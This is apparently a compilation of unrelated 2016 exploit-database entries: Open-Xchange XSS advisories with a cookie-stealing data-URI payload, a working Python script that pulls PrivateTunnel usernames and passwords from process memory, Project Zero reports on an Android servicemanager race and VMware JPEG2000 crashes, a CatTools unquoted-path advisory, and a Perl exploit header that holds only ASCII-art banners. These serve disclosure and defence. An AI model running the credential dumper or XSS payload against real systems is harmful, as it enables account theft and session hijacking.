Fixed version: 7.6.2-rev46, 7.6.3-rev14, 7.8.0-rev29, 7.8.1-rev16, 7.8.2-rev5
Vendor notification: 2016-06-09
Solution date: 2016-08-01
Public disclosure: 2016-09-13
CVE reference: CVE-2016-5740
CVSS: 4.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)
Vulnerability Details:
Description fields of ressources could be used to inject malicious HTML/JS code. When scheduling group appointments and adding such a ressource, the injected code gets executed in the context of a user when viewing appointment details.
Risk:
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.). Note however that explicit permissions are required to create or modify resources in a way that they could contain script code.
Steps to reproduce:
1. Provide HTML including script code as resource description
2. Add this resource to a group appointment
3. As group members, examine the appointment details.
Solution:
Permission settings can be temporarily tightened to reject resource modifications by users. Such descriptions are now handled as plain-text to avoid any kind of script execution. Operators should update to the latest Patch Release.
Internal reference: 46894 (Bug ID)
Vulnerability type: Cross Site Scripting (CWE-80)
Vulnerable version: 7.8.2 and earlier
Vulnerable component: backend
Researcher credits: Jakub A>>oczek
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.2-rev58, 7.6.3-rev14, 7.8.0-rev36, 7.8.1-rev18, 7.8.2-rev5
Vendor notification: 2016-06-27
Solution date: 2016-08-01
Public disclosure: 2016-09-13
CVE reference: CVE-2016-5740
CVSS: 4.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)
Vulnerability Details:
Script code can be injected to HTML E-Mail hyperlinks by using the "data" schema. This method bypasses existing sanitization methods. As a result the script code got injected to hyperlinks displayed at OX App Suite UI.
Risk:
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.).
Steps to reproduce:
1. Compose malicious mail with a link containing a "data" schema with JS code included
2. Make a user click the link
Proof of concept:
<a href="data:text/html,<script>alert(document.cookie);</script>">click me</a>
Solution:
Users should not or interact with mails from untrusted external sources. Targets of hyperlinks shall be examined before clicking the respective link. Operators should update to the latest Patch Release.
Internal reference: 47062 (Bug ID)
Vulnerability type: Cross Site Scripting (CWE-80)
Vulnerable version: 7.8.2 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.2-rev58, 7.6.3-rev14, 7.8.0-rev36, 7.8.1-rev18, 7.8.2-rev5
Vendor notification: 2016-06-27
Solution date: 2016-08-01
Public disclosure: 2016-09-13
CVE reference: CVE-2016-5740
CVSS: 4.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)
Vulnerability Details:
Script code can be stored to the temporary storage for inline-images in HTML E-Mails. Content is available to the user who stored it but also to other (external) users if the unique random ID is known. Note that this storage is volatile and expires if not regulary refreshed. A attacker could however re-upload and refresh the file once uploaded.
Risk:
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (sending mail, deleting data etc.).
Steps to reproduce:
1. Create a file with script code that gets rendered within the browser, e.g. a SVG image with XSL headers
2. Alter the upload request for file?action=new from "image" to "file" to circumvent image related checks
3. Set a MIME-type that makes the browser render the file content inline instead of downloading
4. Fetch the returned UUID
5. Create a link which includes the storage location for the specific item
6. Make a user click that link
Solution:
Users should not open hyperlinks from untrusted sources. Operators should update to the latest Patch Release.
#####
# PrivateTunnel Client v2.7.0 (x64) Local Credentials Disclosure After Sign out Exploit
# Tested on Windows Windows 7 64bit, English
# Vendor Homepage @ https://www.privatetunnel.com
# Date 14/09/2016
# Bug Discovery by:
#
# Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
# http://www.black-rose.ml
#
# Viktor Minin (https://www.linkedin.com/in/MininViktor)
# https://1-33-7.com/
#
#####
# PrivateTunnel Client v2.7.0 is vulnerable to local credentials disclosure after the user is logged out.
# It seems that PrivateTunnel does store the supplied credentials while the user is logged in and after sign out in a plaintext format in memory process.
# A potential attacker could reveal the supplied username and password in order to gain access to PrivateTunnel account.
#
# Authors are not responsible for any misuse or demage which caused by use of this script code.
# Please use responsibly.
#####
# Proof-Of-Concept Code:
import time
import urllib
from winappdbg import Debug, Process
usr = ''
pwd = ''
found = 0
filename = "privatetunnel2.7.0.exe"
process_pid = 0
memory_dump = []
debug = Debug()
try:
print "###########################################################################"
print "# PrivateTunnel v2.7.0 Local Credentials Disclosure Exploit After Sign out#"
print "#\t\tBug Discovery by Yakir Wizman, Victor Minin\t\t #"
print "#\t\tTested on Windows Windows 7 64bit, English\t\t #"
print "#\t\t\tPlease use responsibly.\t\t\t\t #"
print "###########################################################################\r\n"
print "[~] Searching for pid by process name '%s'.." % (filename)
time.sleep(1)
debug.system.scan_processes()
for (process, process_name) in debug.system.find_processes_by_filename(filename):
process_pid = process.get_pid()
if process_pid is not 0:
print "[+] Found process with pid #%d" % (process_pid)
time.sleep(1)
print "[~] Trying to read memory for pid #%d" % (process_pid)
process = Process(process_pid)
user_pattern = '\x20\x22\x70\x61\x73\x73\x77\x6F\x72\x64\x22\x20\x3A\x20\x22(.*)\x22\x2C\x0A\x20\x20\x20\x22\x75\x73\x65\x72\x6E\x61\x6D\x65\x22\x20\x3A\x20\x22(.*)\x22\x0A'
for address in process.search_regexp(user_pattern):
memory_dump.append(address)
try:
usr = memory_dump[0][2].split('"username" : "')[1].replace('"\n', '')
pwd = memory_dump[0][2].split('"password" : "')[1].split('",')[0]
except:
pass
print ""
if usr != '' and pwd !='':
found = 1
print "[+] PrivateTunnel Credentials found!\r\n----------------------------------------"
print "[+] Username: %s" % usr
print "[+] Password: %s" % pwd
if found == 0:
print "[-] Credentials not found!"
else:
print "[-] No process found with name '%s'." % (filename)
debug.loop()
finally:
debug.stop()
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=851
This is very similar to forshaw's bug (<https://code.google.com/p/android/issues/detail?id=200617>, <https://bugs.chromium.org/p/project-zero/issues/detail?id=727>).
The servicemanager, when determining whether the sender of a binder transaction is authorized to register a service via SVC_MGR_ADD_SERVICE, looks up the sender's SELinux context using getpidcon(spid), where spid is the value of the sender_pid field in the binder_transaction_data that was received from the binder driver.
This is problematic because getpidcon($pid) is only safe to use if the caller either knows that the process originally referenced by $pid can't transition from zombie to dead (normally because it is the parent or ptracer of $pid) or if the caller can validate that the process referenced by $pid can not have spawned before $pid referred to the correct process based on the age of the process that $pid points to after the getpidcon() call. (The same thing applies to pretty much any API that refers to processes using PIDs.)
This means that an attacker can, at least theoretically, register arbitrary services that would normally be provided by the system_server if he can execute / cause execution of the following operations in the right order:
- The main exploit process $exploit forks, creates process $child
- $child does $binder_fd = open("/dev/binder", ...)
- $child forks, creates process $subchild
- $child exits. The binder_proc belonging to $binder_fd still holds a reference
to $child. $child transitions to zombie status.
- The exploit repeatedly forks processes that instantly die until there are no unallocated
PIDs between ns_last_pid and $child's PID.
- $subchild sends a SVC_MGR_ADD_SERVICE binder message to the service manager
- the service manager receives the binder message. The kernel fills the
sender_pid field with the result of `task_tgid_nr_ns(sender, [...])`,
where `sender` is `t->from->proc->tsk`, the task_struct of $child.
- $exploit uses `waitpid()` to transition $child from zombie to dead status
- $exploit sends a HANDLE_APPLICATION_STRICT_MODE_VIOLATION_TRANSACTION
binder message to system_server
- system_server launches a new worker thread
(in ActivityManagerService.logStrictModeViolationToDropBox)
- the service manager calls getpidcon()
- system_server's worker thread dies
As far as I can tell, this exploit approach contains the following race conditions:
- If $exploit calls waitpid() before the service manager has performed the binder
read (more accurately, before the task_tgid_nr_ns call), the service manager sees
PID 0. This race isn't hard to win, but it would help to have some primitive to either stall
the service manager after the task_tgid_nr_ns call or at least detect whether it has
performed the binder read. On older Android versions, voluntary_ctxt_switches
in /proc/$pid/status might have helped with that, but nowadays, that's blocked.
When this race condition fails, you'll get an SELinux denial with
scontext=servicemanager.
- If the service manager calls getpidcon() before the system_server has launched a
worker thread, the call will either fail (if there is no such PID) or return the
not-yet-reaped $child process. Again, having a primitive for stalling the service manager
would be useful here.
When this race condition fails, it will cause either an SELinux denial with
scontext=untrusted_app or an "failed to retrieve pid context" error from the
service manager.
- If the system_server's worker thread dies before getpidcon(), getpidcon() will fail.
To avoid this race, it would be very helpful to be able to spawn a thread in system_server
that has a controlled or at least somewhat longer lifetime.
Because of the multiple races, it is hard to hit this bug, at least without spending days on finding ways to eliminate races or widen race windows, optimizing the exploit to not cycle through the whole pid range for every attempt and so on. Because of that, I decided to run my PoC on a patched Android build (based on android-6.0.1_r46) with the following modifications to show that, while the race window is very hard to hit, there is such a race:
-------
$ repo diff
project frameworks/base/
diff --git a/services/core/java/com/android/server/am/ActivityManagerService.java b/services/core/java/com/android/server/am/ActivityManagerService.java
index 33d0a9f..371ecd7 100644
--- a/services/core/java/com/android/server/am/ActivityManagerService.java
+++ b/services/core/java/com/android/server/am/ActivityManagerService.java
@@ -12269,6 +12269,9 @@ public final class ActivityManagerService extends ActivityManagerNative
if (report.length() != 0) {
dbox.addText(dropboxTag, report);
}
+ try {
+ Thread.sleep(2000);
+ } catch (InterruptedException e) {}
}
}.start();
return;
project frameworks/native/
diff --git a/cmds/servicemanager/service_manager.c b/cmds/servicemanager/service_manager.c
index 7fa9a39..0600eb1 100644
--- a/cmds/servicemanager/service_manager.c
+++ b/cmds/servicemanager/service_manager.c
@@ -7,6 +7,7 @@
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
+#include <unistd.h>
#include <private/android_filesystem_config.h>
@@ -204,6 +205,9 @@ int do_add_service(struct binder_state *bs,
if (!handle || (len == 0) || (len > 127))
return -1;
+ if (uid > 1000)
+ sleep(2);
+
if (!svc_can_register(s, len, spid)) {
ALOGE("add_service('%s',%x) uid=%d - PERMISSION DENIED\n",
str8(s, len), handle, uid);
-------
These modifications widen the race windows sufficiently to be able to hit the bug with a few tries.
On the modified build, my PoC causes the following logcat output, demonstrating that the clipboard service has been replaced successfully:
06-15 21:41:00.470 11876 11876 E FIELD--FIELD: accessFlags
06-15 21:41:00.470 11876 11876 E FIELD--FIELD: declaringClass
06-15 21:41:00.470 11876 11876 E FIELD--FIELD: dexFieldIndex
06-15 21:41:00.470 11876 11876 E FIELD--FIELD: offset
06-15 21:41:00.470 11876 11876 E FIELD--FIELD: type
06-15 21:41:00.470 11876 11876 E FIELD--FIELD: ORDER_BY_NAME_AND_DECLARING_CLASS
06-15 21:41:00.480 11876 11876 W racer : NATIVE CODE: trying attack...
06-15 21:41:01.490 11876 11876 W racer : NATIVE CODE: child_pid == unused_pid + 1
06-15 21:41:01.490 11876 11876 W racer : NATIVE CODE: cycle_to_pid...
06-15 21:41:02.900 11876 11876 W racer : NATIVE CODE: cycle_to_pid done
06-15 21:41:04.910 992 992 E ServiceManager: SELinux: getpidcon(pid=11993) failed to retrieve pid context.
06-15 21:41:04.910 992 992 E ServiceManager: add_service('clipboard',63) uid=10052 - PERMISSION DENIED
06-15 21:41:08.920 11876 11876 W racer : NATIVE CODE: pid of last try: 11993
06-15 21:41:08.920 11876 11876 W racer : NATIVE CODE: trying attack...
06-15 21:41:09.930 11876 11876 W racer : NATIVE CODE: child_pid == unused_pid + 1
06-15 21:41:09.930 11876 11876 W racer : NATIVE CODE: cycle_to_pid...
06-15 21:41:11.330 11876 11876 W racer : NATIVE CODE: cycle_to_pid done
06-15 21:41:13.340 992 992 E ServiceManager: add_service('clipboard',63) uid=10052 - ALREADY REGISTERED, OVERRIDE
(Also, to further verify the success: After running the PoC, clipboard accesses in newly spawned apps cause null reference exceptions because the PoC's binder thread has been released in the meantime.)
The issue was tested in the android emulator, with a aosp_x86_64-eng build of the patched android-6.0.1_r46 release.
I have attached the PoC apk (with native code for aarch64 and x86_64; I'm not sure whether the PoC compiles correctly for 32bit) and the Android project tree - but as mentioned earlier, note that the PoC won't work on a build without my patches. If you want to compile it yourself, first run `aarch64-linux-gnu-gcc -static -o app/src/main/jniLibs/arm64-v8a/libracer.so racer.c -Wall -std=gnu99 && gcc -static -o app/src/main/jniLibs/x86_64/libracer.so racer.c` to compile the binaries, then build the project in Android Studio.
I believe that the proper way to fix this issue would be to let the binder driver record the sender's SELinux context when a transaction is sent and then either let the recipient extract the current transaction's SELinux context via an ioctl or store the SELinux context in the binder message. PIDs should not be used during the SELinux context lookup.
Regarding impact:
It looks as if the vulnerable code in the service manager is reachable from isolated_app context, although being isolated is probably going to make it even more difficult to trigger the bug.
After a service is replaced, already-running code should usually continue to use the old service because that reference is cached.
If there is e.g. some system_app that performs permissions checks (which use the "permission" service), it might be possible to bypass such permission checks using this bug, by replacing the real permission service with one that always grants access.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40381.zip
Document Title:
================
SolarWinds Kiwi CatTools Unquoted Service Path Privilege Escalation Vulnerability
Author:
========
Halil Dalabasmaz
Release Date:
==============
29 SEP 2016
Product & Service Introduction:
================================
Kiwi CatTools saves you time by automating common network configuration
tasks including the ability to automatically change and backup network
device configurations. Kiwi CatTools is a software application used by
network administrators to automate many of the tasks they
perform on a daily basis. This is the no longer available freeware version.
Kiwi CatTools automates configuration backups and management on routers,
switches and firewalls. It provides e-mail notification and compare reports
highlighting config changes. Supports Telnet, SSH, TFTP and SNMP. Kiwi CatTools
is designed by network engineers, for network engineers. We understand the tasks
you need to perform and how you work. CatTools is here to make your life easier.
It does this by scheduling batch jobs,automating changes, and reporting on the
things that matter to you as a network administrator.
Vendor Homepage:
=================
http://www.kiwisyslog.com/products/kiwi-cattools/product-overview.aspx
Vulnerability Information:
===========================
The application can be install on Windows system as a service by default service
installation selected. The application a 32-bit application and the default
installation path is "C:\Program Files (x86)" on Windows systems. This could
potentially allow an authorized but non-privileged local user to execute arbitrary
code with elevated privileges on the system. The application work on "Local System"
privileges. A successful attempt would require the local user to be able to insert
their code in the system root path undetected by the OS or other security applications
where it could potentially be executed during application startup or reboot.
C:\Windows\system32>sc qc CatTools
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: CatTools
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\CatTools3\CatTools_Service.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : CatTools
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
Vulnerability Disclosure Timeline:
=========================
13 AUG 2016 - Contact With Vendor
15 AUG 2016 - Vendor Response
15 SEP 2016 - No Response From Vendor
19 SEP 2016 - Public Disclosure
Discovery Status:
==================
Published
Affected Product(s):
=====================
SolarWinds Kiwi CatTools 3.11.0
Tested On:
===========
Windows 7 Ultimate 64-Bit SP1 (EN)
Disclaimer & Information:
==========================
The information provided in this advisory is provided as it is without
any warranty. BGA disclaims all warranties, either expressed or implied,
including the warranties of merchantability and capability for a particular
purpose. BGA or its suppliers are not liable in any case of damage, including
direct, indirect, incidental, consequential loss of business profits or
special damages.
Domain: www.bgasecurity.com
Social: twitter.com/bgasecurity
Contact: advisory@bga.com.tr
Copyright © 2016 | BGA Security LLC
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=850
As already discussed in a number of reports in this tracker (#285, #286, #287, #288, #289, #292), VMware Workstation (current version 12.1.1 build-3770994) ships with a feature called "Virtual Printers", which enables the virtualized operating systems to access printers installed on the Host. Inside the VM, the communication takes place through a COM1 device, and the incoming data is handled by a dedicated "vprintproxy.exe" process on the Host, as launched by the "vmware-vmx.exe" service. Administrative privileges are not required to access COM1 in the guest, at least on Windows.
The vprintproxy.exe is a significant attack surface for potential VM escapes. Due to its nature, the application implements support for a variety of complex protocols and file formats, such as the printing protocol, EMFSPOOL format, and further embedded EMFs, fonts, images etc. This report addresses a multitude of bugs in the handling of JPEG2000 images embedded in a custom record 0x8000 inside EMF, as implemented in the TPView.DLL library extensively used by vprintproxy.exe.
The version of the TPView.DLL file referenced in this report is 9.4.1045.1 (md5sum b6211e8b5c2883fa16231b0a6bf014f3).
The CTPViewDoc::WriteEMF function (adddress 0x100518F0) iterates over all EMF records found in the EMFSPOOL structure sent over COM1 for printing, and performs special handling of some of them. One such record is a custom type 0x8000, expected to store a JPEG2000 image wrapped in a structure similar to that of a EMF_STRETCHDIBITS record. The handler at 0x100516A0, and more specifically a further nested function at 0x1003C000 performs complete parsing of the J2K format, opening up the potential for software vulnerabilities. An example of a bug in that code area discovered in the past is a stack-based buffer overflow in the processing of record 0xff5c (Quantization Default), reported by Kostya Kortchinsky in bug #287.
Since the source code of the JPEG2000 implementation used by VMware is not publicly available, and the file format is sufficiently complex that a manual audit sounds like a dire and very ineffective option to find bugs, I have set up a fuzzing session to automate the process. As a result, with the PageHeap option enabled in Application Verifier for vprintproxy.exe, the fuzzer has managed to trigger hundreds of crashes, in a total of 39 unique code locations. Below is a list of different instructions which generated a crash, with a brief description of the underlying reason.
+----------------------------+-----------------------------------------------+
| Instruction | Reason |
+----------------------------+-----------------------------------------------+
| add [eax+edx*4], edi | Heap buffer overflow |
| cmp [eax+0x440], ebx | Heap out-of-bounds read |
| cmp [eax+0x8], esi | Heap out-of-bounds read |
| cmp [edi+0x70], ebx | Heap out-of-bounds read |
| cmp [edi], edx | Heap out-of-bounds read |
| cmp dword [eax+ebx*4], 0x0 | Heap out-of-bounds read |
| cmp dword [esi+eax*4], 0x0 | Heap out-of-bounds read |
| div dword [ebp-0x24] | Division by zero |
| div dword [ebp-0x28] | Division by zero |
| fld dword [edi] | NULL pointer dereference |
| idiv ebx | Division by zero |
| idiv edi | Division by zero |
| imul ebx, [edx+eax+0x468] | Heap out-of-bounds read |
| mov [eax-0x4], edx | Heap buffer overflow |
| mov [ebx+edx*8], eax | Heap buffer overflow |
| mov [ecx+edx], eax | Heap buffer overflow |
| mov al, [esi] | Heap out-of-bounds read |
| mov bx, [eax] | NULL pointer dereference |
| mov eax, [ecx] | NULL pointer dereference |
| mov eax, [edi+ecx+0x7c] | Heap out-of-bounds read |
| mov eax, [edx+0x7c] | Heap out-of-bounds read |
| movdqa [edi], xmm0 | Heap buffer overflow |
| movq mm0, [eax] | NULL pointer dereference |
| movq mm1, [ebx] | NULL pointer dereference |
| movq mm2, [edx] | NULL pointer dereference |
| movzx eax, byte [ecx-0x1] | Heap out-of-bounds read |
| movzx eax, byte [edx-0x1] | Heap out-of-bounds read |
| movzx ebx, byte [eax+ecx] | Heap out-of-bounds read |
| movzx ecx, byte [esi+0x1] | Heap out-of-bounds read |
| movzx ecx, byte [esi] | Heap out-of-bounds read |
| movzx edi, word [ecx] | NULL pointer dereference |
| movzx esi, word [edx] | NULL pointer dereference |
| push dword [ebp-0x8] | Stack overflow (deep / infinite recursion) |
| push ebp | Stack overflow (deep / infinite recursion) |
| push ebx | Stack overflow (deep / infinite recursion) |
| push ecx | Stack overflow (deep / infinite recursion) |
| push edi | Stack overflow (deep / infinite recursion) |
| push esi | Stack overflow (deep / infinite recursion) |
| rep movsd | Heap buffer overflow, Heap out-of-bounds read |
+----------------------------+-----------------------------------------------+
Considering the volume of the crashes, I don't have the resources to investigate the root cause of each of them, and potentially deduplicate the list even further. My gut feeling is that the entirety of the crashes may represent 10 or more different bugs in the code.
Attached is a Python script which can be used to test each particular JPEG2000 sample: it is responsible for wrapping it in the corresponding EMF + EMFSPOOL structures and sending to the COM1 serial port on the guest system. It is a reworked version of Kostya's original exploit from bug #287. In the same ZIP archive, you can also find up to three samples per each crash site listed above.
It was empirically confirmed that some of the heap corruptions can be leveraged to achieve arbitrary code execution, as when the Page Heap mechanism was disabled, the process would occasionally crash at invalid EIP or a CALL instruction referencing invalid memory addresses (vtables).
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40399.zip
#!/usr/bin/perl
$izd= qq{
██╗███████╗██╗ ██╗███╗ ██╗ █████╗ ██████╗ ██████╗ ██████╗ ██████╗
██║╚══███╔╝██║ ██║████╗ ██║██╔══██╗ ██╔══██╗██╔══██╗██╔═══██╗██╔══██╗
██║ ███╔╝ ██║ ██║██╔██╗ ██║███████║ ██║ ██║██████╔╝██║ ██║██████╔╝
██║ ███╔╝ ██║ ██║██║╚██╗██║██╔══██║ ██║ ██║██╔══██╗██║ ██║██╔═══╝
██║███████╗╚██████╔╝██║ ╚████║██║ ██║ ██████╔╝██║ ██║╚██████╔╝██║
╚═╝╚══════╝ ╚═════╝ ╚═╝ ╚═══╝╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝
};$vg=qq{
▀ ▐░░▄ ▄▄▄▄▄▄▄
▀▀ ▄░ ▐▀▄▀▄ ▄▄▓▓▓▒▒▒▒▒▒▓▓▄
▀▀▀ ▐▄▄░ ▀▐▄ ▄▀▄ ▄ ▄▄▀▀▀ ▀▀▓▓▓▓▒▒░▒▓▓▌
▀ ▄ ▐▀▄ ▀▄░ ▄▄░░ ▀▓▓▓▓▓▓▓▓▓▌
▐▀▄▀▄ ▀▀▄▀▄ ▓▌░░ ▄▄▐▓▀▓▓░▀▓▓▓▌
▀▄▀▄▀▄░ ▐▀▄▀▄ ▐▓▒▄▄ ░▓▀ ▐▀▄▀▒▄▄▒▀▓▓▓▄ ▄▄▄▓▓▓▓▄▄▄
▀ ▀▄▀▌▄░ ▀▄▒▄ ▐▀▓▓ ░░ ▒░░ ▀▀▒▒▒▓▓▒░░░ ░░▒▒▄
▀ ▀ ▐▌ ░█░ ▒▌▐▀▄░▄ ▒░▒░░ ░░▒░ ░░▓
▐▄ ░░░ ░▒░░▒▌ █▄▒░▄ ▄▓▒░ ▐░░ ░░░▒░ ░░
▓▓░▄▓ ░▒░ ░░▐▓ ██▓▓▓▓▓░▄▄ ▐░░░▒▄▒░░░ ░ ░░░░
▀█▓▒▓▓ ░░░░ ░█▒▓▒▒▒▒███▒█▒▒░▒░▐▓▒░░░░░░░ ░ ░░▒▒▒░▒
█░░ ░▒▒░░█▒▒░░░░░ ░░░░░▐▓▒░░░ ░░░ ░░░▒▒▒█░ ░▒▒
▐▒▒▒ █▒▓▌░░░ ░░░▒▒▒░░░░▒▓▓▒██▀▀░░ ░░ ░ ░░▒░░░ ░▒
▓▒░░▐▒░ ░▓ ██▌░░░▄▒▒░░▒▒▒░▒▒▓▓░░ ░░░░▒▄░░▒░░ ░▒
▓▒ ░▒▒▒█ ░▒▓ ▐▒▓░▒▒░ ▐░░ ▀▒▒▒░░░ ░ ▐░░▒▒▒ ░ ░
█░▀▒▒▓▓▓▒▒░░▓ ▄▒░ ▀▒░░░░ ░ ░░░░░ ░░▒▒▒ ░ ▒▒
▀▓▓▀░▓▌▒░▒ ░▒▓▓▓▒▒▒░░░░ ░ ░░▒▒░ ░ ░░▒
▀▀▓▓▌▀░ ░ ░▐▓▓▓▒▓▓▓▄░░░▄ ▐░░░▒▒▒▀ ▐░▒▄░ ▐░░░▒
▐▒▒░░▄▓▓░▌ ░▒▒▓▓▓▓▒░░░ ░▒░▒▓▒▒░▒░░░░░▒░ ░░▒▒▒▓
▀▓▓▀▒▄░░░░░ ░▒▒▓▓▌▀▀▓▓▄▓▒▓░░▒▒░░░▒▓▒▓▓▀▀▀▀▀▀▀▀▀▓▓▄
▓▒░░░▄ ░░▒▓▀ ▀▓▓▓▒▒▓▓▓▓▀░░▒▒▒▀▓▓▓▓▀▀▀▀▓▓
▀▓▄▒▒▒░░░▒▓ ▐▓▓▓▓▓▒▒▒▓▓▀▒▒▒▀▀░░░░░▒▒▒▓▓▓▄
▀▀▀▀ ▀ ▐▓▓▓▀▀▀▀░░░░▒░░▒▒▒▓▓▓▓▒▀▀▀▓▓▌
▄▓▓▓▓▀▀▓▓▓▓▓▓██▀▀▀░░░░░ ▒
▓▒▒▓▌░░░░░░░▒▌░░░░ ░ ░ ▀ ░▄
▓▓▓▓▒▌▄░▒▒▒▒▓▒░░░░▀ ░░░ ░░░▒▌
▄▓▀▀░░░▒▒▄▒▒▓▓░░▄▒░░░▄▄▄▄ ░░░░░▐░
▄▐█▒ ▒░▒▒▒▒░░▓▓▓▒▓▓▓▒▒▒▀░░▀ ▀ ░░▒▌
▄▓▒▒░░░░░░▒▒▒▒▒░▒▓▓▓▓▓▓▓▒▒░ ░ ░ ▒▒█▀
▐▓▒░░░░░░░▒▒▒▒▒▒░▒▓▓▓▓▓▓▓▓▒▌ ░ ▐░ ░ ░▒
▐▒░░░░░░▒▒▒▒▒▒░░▓▓▓▓▓▓▓▓▓▓▓▒▌░ ░ ▐░░░ ░█
▒█░░░░░░▒▒▒▒░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▒▒▌ ░ ▐░░░ ░░▒
▐▓▒░▒░░░░░▒▒▒░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓ ▒▒░░ ░░░░ ░░▒
▄▓▒▒▒░░░░░░░░░░░▓░▓▓▒▓▓▓▓█▀▒▓▓▓▓▓▓▓▓▒░ ░░░░ ░░
▄▒░░░░ ░░░░▒▒▓▓▓▓██▌▐▓▓▓░░▓▓▌░▓▓▓▓▒░ ░ ░░░░ ░░▒
▒░░░░░░▒▒▓▓▓▓▓▓▓█ ▐▓▓▓▓░░░▒▌░▓▓▓▓▒░ ░ ░░░░ ▐▒▌
▒▀░░░▒░░▓▒▓▓▓▓▓▌▀ ▐▓▓▓▓░░░▒▌░▓▓▓▓▒░ ░ ░░░░ ░▒▌
▓ ░▒░░░▀▀▒▓▓▓▓▓▌ ▐▓▓▓ ░░░░░░▓▓▓▓▒░ ░ ░ ░ ░▒▒▌
▓▓▒░▒░░▒▒▒▓▓▓▓▓▓▌ ▀▓▓▓▓▓▓▓▓▒░ ░░░ ░▄░▒▓▌
░ ▀▒▓▓▓▓▓▓▓▓▓▌▀▀ ▒░ ░ ░░▓▓▄
░ ▓ ▓▒░ ░░▒▀▒░▒▄
▄ ░ ▀ ▓▒░░▄░░░░░▀░░░▌░░▒
░ ▄▄▀ ▀▒▒▒▒▒▄ ▄░░░░ ▀▀
░░░ ▓▓▓▒▒▓▄░░ ░ ▐░▄ ░
░ ░▀░░ ▀▀▒▒▒▒▀ ▀▒ ▄
▄▄▄▄▄▄ ▄▀▒▓▌▄ ▀▄ ░ ░
▓▓▓▓▌▄ ▄▓▓▓▓▓▓▓ ▒ ▄ ░ ▄
▓▒▒▓▓▓▓▓▓▓▓▒▓▓▓▓▓ ░ ▀▓ ▄
▓▒▒▓▓▓▓▓▓▒▓▓▓▓▓▀ ░ ▀▄░▒▌▄▄
▄▄▄▓▓▓▓▓▓▓▓▓▓▓███▀ ▄▓▄▄▄▄▄▒▓▓▓▓▄
▄▓▓▓▓▓▓▓▓▓▒▓▓▓▓▓█ ▐▓████▓▓▓▓▓▓▒▓▓
▓▓▓▓▄▄▄▄▓▓▓▓▓▓▓█ ▐▓░░░▒▓▓▓▓▒▓▓
▐▓▓░▒▓▓▓▓▓▓▓
▐▓▓▓▓▓▓▒▒▓▌
▓▓▓▓█▒▒▒▒▒▒▒▓▓▌
██▒░░░░░░░▓▓███
};$b=qq{
██╗ ██╗███████╗ ██████╗ █████╗ ██████╗ ███╗ ██╗███████╗
██║ ██║██╔════╝██╔════╝ ██╔══██╗██╔══██╗████╗ ██║██╔════╝
██║ ██║█████╗ ██║ ███╗███████║██║ ██║██╔██╗ ██║███████╗
╚██╗ ██╔╝██╔══╝ ██║ ██║██╔══██║██║ ██║██║╚██╗██║╚════██║
╚████╔╝ ███████╗╚██████╔╝██║ ██║██████╔╝██║ ╚████║███████║
╚═══╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝╚═════╝ ╚═╝ ╚═══╝╚══════╝
██████╗ ███████╗███╗ ███╗ ██████╗ ████████╗███████╗
██╔══██╗██╔════╝████╗ ████║██╔═══██╗╚══██╔══╝██╔════╝
██████╔╝█████╗ ██╔████╔██║██║ ██║ ██║ █████╗
██╔══██╗██╔══╝ ██║╚██╔╝██║██║ ██║ ██║ ██╔══╝
██║ ██║███████╗██║ ╚═╝ ██║╚██████╔╝ ██║ ███████╗
╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚══════╝
███████╗██╗ ██╗██████╗ ██╗ ██████╗ ██╗████████╗ ██████╗ ██╗ ██╗
██╔════╝╚██╗██╔╝██╔══██╗██║ ██╔═══██╗██║╚══██╔══╝ ██╔══██╗╚██╗ ██╔╝
█████╗ ╚███╔╝ ██████╔╝██║ ██║ ██║██║ ██║ ██████╔╝ ╚████╔╝
██╔══╝ ██╔██╗ ██╔═══╝ ██║ ██║ ██║██║ ██║ ██╔══██╗ ╚██╔╝
███████╗██╔╝ ██╗██║ ███████╗╚██████╔╝██║ ██║ ██████╔╝ ██║
╚══════╝╚═╝ ╚═╝╚═╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝
▄
▄█▀ ▀█▄▄
▄▄▓▀▀ ▀▓▄▄
▄▓▓▀ ▀█▓▄
▄▓▓▀ ▀▓▓▓▄
▄▓▓█▀ ▀▓▓▄▄
▄▓▓▓▀ ▀▓▓▓▄
▄▓▓▓▀ ▀▓▓▓▓
▓▓▓▓▀ ▀▓▓▓▓▄
▓▓▓▓█ ▀▓▓▓▓
▐▓▓▓▀ ▓▓▓▌
▓▓▓▌ ▐▓▓▓
▓▓▓▌ ▄▓▓▓
▓▓▓▓ ▄▓▓▓
▓▓▓▓▓▓▓▓▓▓██ ██▓▓▓▓▓▓▓▓▓▓
▀▀▀▀ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▀▀█
▄▄▓▓▓▓▓▓▓▓▓▓▓████▓▓▓▓▓▀ ▓▓▓▓▓████▓▓▓▓▓▓▓▓▓▓▓▄▄
